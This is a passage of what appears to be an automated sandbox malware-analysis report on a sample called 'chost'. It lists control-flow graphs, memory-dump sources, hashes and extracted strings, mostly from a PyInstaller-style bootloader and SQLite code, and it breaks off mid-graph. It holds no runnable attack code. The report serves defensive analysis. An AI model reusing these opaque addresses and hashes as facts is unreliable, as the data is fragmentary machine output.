                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                        • Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                                                                                                                                                                                                        • Instruction ID: ec4b37d6c3ea0c03a9ced62c6e4a9f40e4ed2a7e83b8c715eb7a5da5b5a35b35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D815B71A0CA8786EB709B36D0C62AD73A0EB48784F44C4B9E98DC7796DE3CE545CB40

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1171 7ffdf70b2140-7ffdf70b2186 1172 7ffdf70b21e8-7ffdf70b21f9 call 7ffdf70b1ca0 1171->1172 1173 7ffdf70b2188-7ffdf70b218f 1171->1173 1179 7ffdf70b27c5-7ffdf70b27e2 1172->1179 1180 7ffdf70b21ff-7ffdf70b2202 1172->1180 1173->1172 1175 7ffdf70b2191-7ffdf70b21a9 1173->1175 1177 7ffdf70b21b0-7ffdf70b21ba 1175->1177 1177->1177 1178 7ffdf70b21bc-7ffdf70b21ce call 7ffdf7056860 1177->1178 1189 7ffdf70b21df-7ffdf70b21e6 1178->1189 1190 7ffdf70b21d0-7ffdf70b21da 00007FFE0E142010 1178->1190 1182 7ffdf70b2224-7ffdf70b2241 call 7ffdf70b1a70 1180->1182 1183 7ffdf70b2204-7ffdf70b2208 1180->1183 1192 7ffdf70b2243-7ffdf70b224c call 7ffdf70a8470 1182->1192 1193 7ffdf70b2251-7ffdf70b2260 1182->1193 1186 7ffdf70b220a-7ffdf70b220c 1183->1186 1187 7ffdf70b2222 1183->1187 1186->1187 1191 7ffdf70b220e-7ffdf70b221d call 7ffdf705a490 1186->1191 1187->1182 1189->1193 1190->1189 1191->1179 1192->1193 1193->1179 1196 7ffdf70b2266-7ffdf70b2293 call 7ffdf70b1d80 1193->1196 1200 7ffdf70b27b6-7ffdf70b27c0 call 7ffdf70563e0 1196->1200 1201 7ffdf70b2299-7ffdf70b22ed call 7ffdf70afcb0 1196->1201 1200->1179 1201->1200 1205 7ffdf70b22f3-7ffdf70b22fa 1201->1205 1206 7ffdf70b2338-7ffdf70b233b 1205->1206 1207 7ffdf70b22fc-7ffdf70b2332 call 7ffdf70afcb0 1205->1207 1208 7ffdf70b2341-7ffdf70b2353 call 7ffdf70d4a80 1206->1208 1209 7ffdf70b2402-7ffdf70b240a call 7ffdf7056860 1206->1209 1207->1200 1207->1206 1208->1200 1216 7ffdf70b2359-7ffdf70b236a call 7ffdf70b0790 1208->1216 1215 7ffdf70b240f-7ffdf70b2415 1209->1215 1217 7ffdf70b241b-7ffdf70b2470 1215->1217 1218 7ffdf70b27ac-7ffdf70b27af 1215->1218 1225 7ffdf70b23d8-7ffdf70b23e9 call 7ffdf70b0ff0 1216->1225 1226 7ffdf70b236c-7ffdf70b2377 1216->1226 1217->1179 1220 7ffdf70b2476-7ffdf70b247d 1217->1220 1218->1200 1222 7ffdf70b24a9-7ffdf70b24c2 call 7ffdf70b9930 1220->1222 1223 7ffdf70b247f-7ffdf70b2486 1220->1223 1237 7ffdf70b24c4-7ffdf70b24cc call 7ffdf70820b0 1222->1237 1238 7ffdf70b24d1-7ffdf70b2581 call 7ffdf7082200 call 7ffdf7083940 call 7ffdf7082120 call 7ffdf7082200 * 2 call 7ffdf70830a0 1222->1238 1227 7ffdf70b2488-7ffdf70b248f 1223->1227 1228 7ffdf70b2495-7ffdf70b24a3 call 7ffdf7081cc0 1223->1228 1225->1209 1242 7ffdf70b23eb-7ffdf70b23fd call 7ffdf705a490 1225->1242 1232 7ffdf70b2379-7ffdf70b239a call 7ffdf705a490 1226->1232 1233 7ffdf70b239f-7ffdf70b23b6 1226->1233 1227->1228 1234 7ffdf70b2491 1227->1234 1228->1179 1228->1222 1232->1200 1240 7ffdf70b23b8-7ffdf70b23c4 1233->1240 1241 7ffdf70b23cb-7ffdf70b23d3 call 7ffdf70b2070 1233->1241 1234->1228 1237->1238 1263 7ffdf70b2583-7ffdf70b2586 1238->1263 1264 7ffdf70b25b4-7ffdf70b25cd call 7ffdf7082190 1238->1264 1240->1241 1246 7ffdf70b23c6 call 7ffdf70b9760 1240->1246 1241->1200 1242->1200 1246->1241 1263->1264 1265 7ffdf70b2588-7ffdf70b25b2 call 7ffdf7082200 1263->1265 1270 7ffdf70b25d3-7ffdf70b25da 1264->1270 1265->1270 1271 7ffdf70b25dc-7ffdf70b25e3 1270->1271 1272 7ffdf70b25fd-7ffdf70b2600 1270->1272 1275 7ffdf70b25e5-7ffdf70b25ec 1271->1275 1276 7ffdf70b25f2-7ffdf70b25fa call 7ffdf7081cc0 1271->1276 1273 7ffdf70b2630-7ffdf70b2640 1272->1273 1274 7ffdf70b2602-7ffdf70b2612 1272->1274 1279 7ffdf70b2663-7ffdf70b2688 1273->1279 1280 7ffdf70b2642-7ffdf70b2661 call 7ffdf7082010 1273->1280 1274->1273 1278 7ffdf70b2614-7ffdf70b262b call 7ffdf70afd70 1274->1278 1275->1276 1281 7ffdf70b25ee 1275->1281 1276->1272 1278->1273 1285 7ffdf70b2690-7ffdf70b2694 1279->1285 1280->1285 1281->1276 1287 7ffdf70b2696 1285->1287 1288 7ffdf70b269a-7ffdf70b26ba call 7ffdf7082190 1285->1288 1287->1288 1291 7ffdf70b26bc-7ffdf70b26e0 call 7ffdf7081fb0 1288->1291 1292 7ffdf70b26e2-7ffdf70b2712 1288->1292 1294 7ffdf70b2717-7ffdf70b271e 1291->1294 1292->1294 1296 7ffdf70b2768-7ffdf70b2789 call 7ffdf7082200 1294->1296 1297 7ffdf70b2720-7ffdf70b2722 1294->1297 1305 7ffdf70b278b-7ffdf70b2796 1296->1305 1306 7ffdf70b279d-7ffdf70b27aa call 7ffdf70820b0 1296->1306 1298 7ffdf70b272c-7ffdf70b273f 1297->1298 1299 7ffdf70b2724-7ffdf70b272a 1297->1299 1301 7ffdf70b2759-7ffdf70b2764 1298->1301 1302 7ffdf70b2741-7ffdf70b2757 call 7ffdf7083350 1298->1302 1299->1298 1301->1296 1302->1296 1305->1306 1306->1179
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                        • API String ID: 2636501453-2846519077
                                                                                                                                                                                                                                        • Opcode ID: eced021f1f1d06cff38bad0d74cb89a79df235ec64024b8df40a4abb3614a0a3
                                                                                                                                                                                                                                        • Instruction ID: 7034b502be305348d052efbec1eeb5c0788386a7e82c3ab983d9bdaf8b07821b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eced021f1f1d06cff38bad0d74cb89a79df235ec64024b8df40a4abb3614a0a3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F02AC6AB0878286EB14DB299420BE937A1FF84B84F008235DE6D877D9DF3CE6559700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
                                                                                                                                                                                                                                        • Instruction ID: fbe4bb88f423b63cf7ec68f3a98233567181d92f7e926d74c7dbaf814e6d0848
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73416D31A0868395EF20DB3394825B9B3A1EF44794F84C4BAEE4D87B96DE3CE505CB04

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1648 7ffdf70d44f0-7ffdf70d45b4 call 7ffdf70d41f0 1651 7ffdf70d45ba-7ffdf70d45d8 1648->1651 1652 7ffdf70d4966-7ffdf70d4969 1648->1652 1655 7ffdf70d45da-7ffdf70d45ed 1651->1655 1656 7ffdf70d45f2-7ffdf70d45f6 1651->1656 1653 7ffdf70d496b-7ffdf70d4971 1652->1653 1654 7ffdf70d4973-7ffdf70d4976 call 7ffdf7056c20 1652->1654 1653->1654 1657 7ffdf70d497b-7ffdf70d4981 call 7ffdf70b1350 1653->1657 1654->1657 1659 7ffdf70d498f-7ffdf70d49ae call 7ffdf7182bc0 1655->1659 1660 7ffdf70d4606-7ffdf70d4612 1656->1660 1661 7ffdf70d45f8-7ffdf70d45ff 1656->1661 1670 7ffdf70d4986-7ffdf70d4988 1657->1670 1662 7ffdf70d4614-7ffdf70d4618 1660->1662 1663 7ffdf70d461e-7ffdf70d4622 1660->1663 1661->1660 1666 7ffdf70d4601 call 7ffdf706fe80 1661->1666 1662->1663 1667 7ffdf70d469b-7ffdf70d46a6 1662->1667 1668 7ffdf70d462a-7ffdf70d462f call 7ffdf7073750 1663->1668 1669 7ffdf70d4624-7ffdf70d4628 1663->1669 1666->1660 1675 7ffdf70d46b0-7ffdf70d46c7 call 7ffdf707d640 1667->1675 1676 7ffdf70d4634-7ffdf70d4638 1668->1676 1669->1668 1673 7ffdf70d4698 1669->1673 1670->1659 1673->1667 1681 7ffdf70d46c9-7ffdf70d46d1 1675->1681 1676->1673 1678 7ffdf70d463a-7ffdf70d4647 call 7ffdf71129e0 1676->1678 1685 7ffdf70d4649 1678->1685 1686 7ffdf70d467e-7ffdf70d4685 1678->1686 1683 7ffdf70d46d3-7ffdf70d46dc 1681->1683 1684 7ffdf70d46de 1681->1684 1687 7ffdf70d46e1-7ffdf70d46ef 1683->1687 1684->1687 1690 7ffdf70d4650-7ffdf70d4659 1685->1690 1688 7ffdf70d4687-7ffdf70d468a call 7ffdf70563e0 1686->1688 1689 7ffdf70d468f-7ffdf70d4693 1686->1689 1691 7ffdf70d47a5 1687->1691 1692 7ffdf70d46f5-7ffdf70d46f8 1687->1692 1688->1689 1694 7ffdf70d4949-7ffdf70d4951 1689->1694 1690->1690 1695 7ffdf70d465b-7ffdf70d466d call 7ffdf7056860 1690->1695 1698 7ffdf70d47aa-7ffdf70d47bd 1691->1698 1696 7ffdf70d46fa-7ffdf70d46ff 1692->1696 1697 7ffdf70d4735-7ffdf70d473b 1692->1697 1702 7ffdf70d4953-7ffdf70d4957 1694->1702 1703 7ffdf70d495e-7ffdf70d4964 1694->1703 1695->1686 1724 7ffdf70d466f-7ffdf70d4679 00007FFE0E142010 1695->1724 1696->1697 1705 7ffdf70d4701-7ffdf70d4716 1696->1705 1697->1691 1701 7ffdf70d473d-7ffdf70d4750 call 7ffdf7056860 1697->1701 1699 7ffdf70d47f3-7ffdf70d4806 1698->1699 1700 7ffdf70d47bf-7ffdf70d47c4 1698->1700 1709 7ffdf70d480c-7ffdf70d4814 1699->1709 1710 7ffdf70d4808 1699->1710 1706 7ffdf70d47d6-7ffdf70d47dd 1700->1706 1707 7ffdf70d47c6-7ffdf70d47cb 1700->1707 1730 7ffdf70d4786-7ffdf70d478d 1701->1730 1731 7ffdf70d4752-7ffdf70d4783 1701->1731 1702->1703 1711 7ffdf70d4959 call 7ffdf706fe50 1702->1711 1703->1652 1703->1670 1713 7ffdf70d472b-7ffdf70d4733 call 7ffdf70ba8e0 1705->1713 1714 7ffdf70d4718-7ffdf70d471b 1705->1714 1719 7ffdf70d47e0-7ffdf70d47ee call 7ffdf7072e10 1706->1719 1716 7ffdf70d47d4 1707->1716 1717 7ffdf70d47cd-7ffdf70d47d2 1707->1717 1721 7ffdf70d485c-7ffdf70d485e 1709->1721 1722 7ffdf70d4816-7ffdf70d4829 call 7ffdf7056860 1709->1722 1710->1709 1711->1703 1713->1698 1714->1713 1715 7ffdf70d471d-7ffdf70d471f 1714->1715 1715->1713 1725 7ffdf70d4721-7ffdf70d4726 1715->1725 1716->1706 1717->1719 1719->1699 1726 7ffdf70d486b-7ffdf70d48c2 call 7ffdf7059160 call 7ffdf70cd030 1721->1726 1727 7ffdf70d4860-7ffdf70d4864 1721->1727 1742 7ffdf70d482b-7ffdf70d483d 1722->1742 1743 7ffdf70d4842-7ffdf70d4849 1722->1743 1724->1686 1733 7ffdf70d493a-7ffdf70d493e 1725->1733 1749 7ffdf70d48c7-7ffdf70d48d9 1726->1749 1727->1726 1734 7ffdf70d4866 1727->1734 1736 7ffdf70d4797-7ffdf70d47a0 1730->1736 1737 7ffdf70d478f-7ffdf70d4792 call 7ffdf70563e0 1730->1737 1731->1730 1733->1694 1740 7ffdf70d4940-7ffdf70d4944 call 7ffdf7074b40 1733->1740 1734->1726 1736->1733 1737->1736 1740->1694 1742->1743 1746 7ffdf70d484b-7ffdf70d484e call 7ffdf70563e0 1743->1746 1747 7ffdf70d4853-7ffdf70d4857 1743->1747 1746->1747 1747->1733 1750 7ffdf70d48db-7ffdf70d48e1 call 7ffdf70563e0 1749->1750 1751 7ffdf70d48e6-7ffdf70d48e8 1749->1751 1750->1751 1753 7ffdf70d48ea-7ffdf70d48f0 call 7ffdf70ae560 1751->1753 1754 7ffdf70d48f5-7ffdf70d48f9 1751->1754 1753->1754 1755 7ffdf70d48fb-7ffdf70d4910 call 7ffdf70b13e0 1754->1755 1756 7ffdf70d4912-7ffdf70d4914 1754->1756 1755->1733 1759 7ffdf70d4925-7ffdf70d4935 1756->1759 1760 7ffdf70d4916-7ffdf70d491e 1756->1760 1759->1733 1760->1733 1762 7ffdf70d4920-7ffdf70d4923 1760->1762 1762->1733 1762->1759
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                        • API String ID: 2636501453-879093740
                                                                                                                                                                                                                                        • Opcode ID: 085563fcc5d81c541c56ca20a765e2d333a69d606b4c0063fede42f7eeced0c1
                                                                                                                                                                                                                                        • Instruction ID: 7957154591c1a345a78a813f4ed34c07e598acbd4e7d4a20b4a7ac105986ab71
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 085563fcc5d81c541c56ca20a765e2d333a69d606b4c0063fede42f7eeced0c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4E19A2AF0879286EB10CB658060AFC27B5BF45B88F054235EE6D977D9DF38E856D340

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1763 7ff694361210-7ff69436126d call 7ff69436bdf0 1766 7ff694361297-7ff6943612af call 7ff694374fb4 1763->1766 1767 7ff69436126f-7ff694361296 call 7ff694362710 1763->1767 1772 7ff6943612d4-7ff6943612e4 call 7ff694374fb4 1766->1772 1773 7ff6943612b1-7ff6943612cf call 7ff694374f78 call 7ff694362910 1766->1773 1779 7ff6943612e6-7ff694361304 call 7ff694374f78 call 7ff694362910 1772->1779 1780 7ff694361309-7ff69436131b 1772->1780 1785 7ff694361439-7ff69436146d call 7ff69436bad0 call 7ff694374fa0 * 2 1773->1785 1779->1785 1781 7ff694361320-7ff694361345 call 7ff69437040c 1780->1781 1792 7ff69436134b-7ff694361355 call 7ff694370180 1781->1792 1793 7ff694361431 1781->1793 1792->1793 1799 7ff69436135b-7ff694361367 1792->1799 1793->1785 1801 7ff694361370-7ff694361398 call 7ff69436a230 1799->1801 1804 7ff69436139a-7ff69436139d 1801->1804 1805 7ff694361416-7ff69436142c call 7ff694362710 1801->1805 1807 7ff69436139f-7ff6943613a9 1804->1807 1808 7ff694361411 1804->1808 1805->1793 1809 7ff6943613ab-7ff6943613b9 call 7ff694370b4c 1807->1809 1810 7ff6943613d4-7ff6943613d7 1807->1810 1808->1805 1814 7ff6943613be-7ff6943613c1 1809->1814 1812 7ff6943613ea-7ff6943613ef 1810->1812 1813 7ff6943613d9-7ff6943613e7 call 7ff694389ea0 1810->1813 1812->1801 1816 7ff6943613f5-7ff6943613f8 1812->1816 1813->1812 1817 7ff6943613c3-7ff6943613cd call 7ff694370180 1814->1817 1818 7ff6943613cf-7ff6943613d2 1814->1818 1820 7ff6943613fa-7ff6943613fd 1816->1820 1821 7ff69436140c-7ff69436140f 1816->1821 1817->1812 1817->1818 1818->1805 1820->1805 1823 7ff6943613ff-7ff694361407 1820->1823 1821->1793 1823->1781
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                        • Opcode ID: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
                                                                                                                                                                                                                                        • Instruction ID: f813a1856acce7d8b3ba131ce072bca2542d7676ce791fc6517b6d2ab97eca0e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751A022A0864381EA71AF37A4913BE76A1EF85794F948179ED8DC77D5EE3CE501C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF694363804), ref: 00007FF6943636E1
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF694363804), ref: 00007FF6943636EB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                        • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction ID: ad89d284a4f32fd5033b4908fd792bae1f8a9b69c2725c3d8090cf31d9438c3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5218361B1864381FA309733EC963BA7250FF88394F40817EE65DC26D5EE2CE505C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2065 7ff69437bacc-7ff69437baf2 2066 7ff69437bb0d-7ff69437bb11 2065->2066 2067 7ff69437baf4-7ff69437bb08 call 7ff694374f58 call 7ff694374f78 2065->2067 2068 7ff69437bee7-7ff69437bef3 call 7ff694374f58 call 7ff694374f78 2066->2068 2069 7ff69437bb17-7ff69437bb1e 2066->2069 2081 7ff69437befe 2067->2081 2088 7ff69437bef9 call 7ff69437a950 2068->2088 2069->2068 2071 7ff69437bb24-7ff69437bb52 2069->2071 2071->2068 2074 7ff69437bb58-7ff69437bb5f 2071->2074 2078 7ff69437bb78-7ff69437bb7b 2074->2078 2079 7ff69437bb61-7ff69437bb73 call 7ff694374f58 call 7ff694374f78 2074->2079 2084 7ff69437bee3-7ff69437bee5 2078->2084 2085 7ff69437bb81-7ff69437bb87 2078->2085 2079->2088 2086 7ff69437bf01-7ff69437bf18 2081->2086 2084->2086 2085->2084 2089 7ff69437bb8d-7ff69437bb90 2085->2089 2088->2081 2089->2079 2092 7ff69437bb92-7ff69437bbb7 2089->2092 2094 7ff69437bbea-7ff69437bbf1 2092->2094 2095 7ff69437bbb9-7ff69437bbbb 2092->2095 2096 7ff69437bbc6-7ff69437bbdd call 7ff694374f58 call 7ff694374f78 call 7ff69437a950 2094->2096 2097 7ff69437bbf3-7ff69437bc1b call 7ff69437d66c call 7ff69437a9b8 * 2 2094->2097 2098 7ff69437bbbd-7ff69437bbc4 2095->2098 2099 7ff69437bbe2-7ff69437bbe8 2095->2099 2129 7ff69437bd70 2096->2129 2125 7ff69437bc1d-7ff69437bc33 call 7ff694374f78 call 7ff694374f58 2097->2125 2126 7ff69437bc38-7ff69437bc63 call 7ff69437c2f4 2097->2126 2098->2096 2098->2099 2101 7ff69437bc68-7ff69437bc7f 2099->2101 2104 7ff69437bcfa-7ff69437bd04 call 7ff69438398c 2101->2104 2105 7ff69437bc81-7ff69437bc89 2101->2105 2116 7ff69437bd0a-7ff69437bd1f 2104->2116 2117 7ff69437bd8e 2104->2117 2105->2104 2109 7ff69437bc8b-7ff69437bc8d 2105->2109 2109->2104 2113 7ff69437bc8f-7ff69437bca5 2109->2113 2113->2104 2118 7ff69437bca7-7ff69437bcb3 2113->2118 2116->2117 2122 7ff69437bd21-7ff69437bd33 GetConsoleMode 2116->2122 2120 7ff69437bd93-7ff69437bdb3 ReadFile 2117->2120 2118->2104 2123 7ff69437bcb5-7ff69437bcb7 2118->2123 2127 7ff69437bead-7ff69437beb6 GetLastError 2120->2127 2128 7ff69437bdb9-7ff69437bdc1 2120->2128 2122->2117 2130 7ff69437bd35-7ff69437bd3d 2122->2130 2123->2104 2131 7ff69437bcb9-7ff69437bcd1 2123->2131 2125->2129 2126->2101 2136 7ff69437beb8-7ff69437bece call 7ff694374f78 call 7ff694374f58 2127->2136 2137 7ff69437bed3-7ff69437bed6 2127->2137 2128->2127 2133 7ff69437bdc7 2128->2133 2138 7ff69437bd73-7ff69437bd7d call 7ff69437a9b8 2129->2138 2130->2120 2135 7ff69437bd3f-7ff69437bd61 ReadConsoleW 2130->2135 2131->2104 2139 7ff69437bcd3-7ff69437bcdf 2131->2139 2144 7ff69437bdce-7ff69437bde3 2133->2144 2146 7ff69437bd63 GetLastError 2135->2146 2147 7ff69437bd82-7ff69437bd8c 2135->2147 2136->2129 2141 7ff69437bedc-7ff69437bede 2137->2141 2142 7ff69437bd69-7ff69437bd6b call 7ff694374eec 2137->2142 2138->2086 2139->2104 2140 7ff69437bce1-7ff69437bce3 2139->2140 2140->2104 2150 